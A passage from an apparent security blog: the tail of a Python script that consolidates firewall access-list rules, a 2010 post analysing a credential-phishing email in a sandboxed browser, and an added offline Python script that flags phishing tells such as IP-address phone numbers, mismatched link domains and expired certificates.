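    cfg += [f" network-object host {h}" for h in hosts]
    cfg += [
        f"access-list {acl} remark ***** {description} *****",
        f"access-list {acl} extended permit tcp object-group {net_group} any "
        f"object-group {svc_group}",
    ]
    return cfg, warnings


if __name__ == "__main__":
    config, warns = consolidate(SAMPLE_ACES, "acl_inside", "External_Access",
                                "External_Access_Users", "Access to external websites")
    print("\n".join(config))
    print("\n".join("! WARNING: " + w for w in warns))
```

Run it against the output of show running-config access-list for the ACL you are tidying and read the warnings before pasting the result in: each “widened to any” line is a rule that just became broader than what was originally approved.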

    Jul 08 2010

    Yet another Phishing email

    Today one of our faculty members forwarded an email to our help desk and asked us to take a look at it because it might be a phishing/spam email; you can only imagine how happy that made me. Now in the past we have had cases where people replied to these types of emails and received more spam in the process, or worse, “gave their credentials away”, but that was not the case today.

    Below is an image of the email that was received today.

    Fig-1 Phishing Email

    Now the first thing that I found funny about this email is the fact that the phone number for tech support was an IP address. Maybe they overlooked that one or it was done out of humor; either way it set off some flags for me, and it should for anyone who receives an email like this.

    Once I identified the email as a phishing attempt to harvest login credentials I got curious and decided to load Firefox within Sandboxie and click on the link in the email to see what it would do.

    Fig-2 Firefox Untrusted Error

    Now after clicking on the link in the email I was redirected to www.eformit.com, which triggered a Firefox error because Firefox was unable to confirm that my connection to the site was secure. Since I was in search of seeing where the link would take me I went ahead and added the certificate and continued. In general, if you ever get this error you should never add the certificate but instead close your browser and do some research on the site in question.

    Next I went ahead and examined the server’s SSL certificate and realised that it had expired a few days ago; that is another sign that this site is bad business, but since I already knew that I proceeded all the same.

    Fig-3 Expired Cert

    Now on to the next portion of this journey: after clicking on the link I was taken to a website with a very contradictory notice, “we will never send emails to users requesting email account information”, which is exactly what the page is asking you to type in.

    Fig-4 Credentials harvesting form

    Now lastly, after filling in my email and password :), I was redirected to a parking page filled with cheap advertising, another sign of trouble.

    Fig-5 Redirected page

    Additional information courtesy of http://anubis.iseclab.org, a very useful source for analysing uncertain files and URLs.

    Fig-6 Additional network analysis information

    In the end it is always important to train your users to identify what a good or bad email looks like and what your network policies are for these types of emails. Also, when in doubt, load up your sandbox and have some fun.
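As an added example that is not part of the original post: a small offline triage script that encodes the tells described above, a support phone number that is really an IP address, a link whose host is not under the sender’s domain (or is a raw IP), and a landing-page certificate that has already expired. The message, the example domains and the certificate’s notAfter value are constructed for the example; cert_expired takes the notAfter string in the format Python’s ssl.getpeercert() returns, so it can be applied to a certificate pulled from a sandboxed browser session or from openssl s_client.

```python
"""Added example, not code from the original post: offline triage of a
suspicious e-mail using the tells described above.  The message and the
certificate's notAfter value are constructed; nothing is fetched."""
import re
import ssl
from urllib.parse import urlparse

IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
URL_RE = re.compile(r"https?://[^\s<>\"']+")
# 'phone', 'tel' or 'call' ... ':' value, e.g. 'call tech support: 203.0.113.45'
PHONE_RE = re.compile(r"\b(?:phone|tel|call)\b[^\n:]*:\s*(\S+)", re.I)

# Constructed message modelled on the one in the post (RFC 2606 example domains)
SAMPLE_MESSAGE = """From: Help Desk <helpdesk@university.example.edu>
To: faculty@university.example.edu
Subject: Mailbox quota exceeded - verify your account

Your mailbox has exceeded its quota. To keep your account active,
verify your details at https://webmail-update.example.net/verify.php
For help call tech support: 203.0.113.45
"""
SAMPLE_NOT_AFTER = "Jul  5 00:00:00 2010 GMT"   # constructed; ssl.getpeercert() format


def sender_domain(from_header):
    """Domain part of the From: header, lower-cased ('' if none)."""
    m = re.search(r"@([\w.-]+)", from_header)
    return m.group(1).lower() if m else ""


def same_org(host, domain):
    """True if host is the sender's domain or a subdomain of it."""
    host, domain = host.lower(), domain.lower()
    return host == domain or host.endswith("." + domain)


def cert_expired(not_after, now):
    """not_after as in ssl.getpeercert()['notAfter']; now is seconds since
    the epoch (a parameter so the check is repeatable in a test)."""
    return ssl.cert_time_to_seconds(not_after) < now


def triage(message, now, cert_not_after=None):
    """Return a list of findings; an empty list means no tell was found."""
    headers, _, body = message.partition("\n\n")
    from_line = next((h for h in headers.splitlines()
                      if h.lower().startswith("from:")), "")
    domain = sender_domain(from_line)
    findings = []
    for m in PHONE_RE.finditer(body):
        if re.fullmatch(IPV4, m.group(1)):
            findings.append(f"support phone number is an IP address: {m.group(1)}")
    for url in URL_RE.findall(body):
        host = urlparse(url).hostname or ""
        if re.fullmatch(IPV4, host):
            findings.append(f"link points at a raw IP address: {url}")
        elif domain and not same_org(host, domain):
            findings.append(f"link host {host} is not under sender domain {domain}: {url}")
    if cert_not_after is not None and cert_expired(cert_not_after, now):
        findings.append(f"landing page certificate expired on {cert_not_after}")
    return findings


if __name__ == "__main__":
    import time
    for finding in triage(SAMPLE_MESSAGE, time.time(), SAMPLE_NOT_AFTER):
        print("-", finding)
```

None of these checks is proof on its own (legitimate mail does link to third-party domains), but each one is cheap, and a message that trips all three is exactly the kind that should go to the sandbox rather than to a user’s browser.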

    References

    http://scanner.novirusthanks.org/

    http://anubis.iseclab.org

    http://www.sandboxie.com/
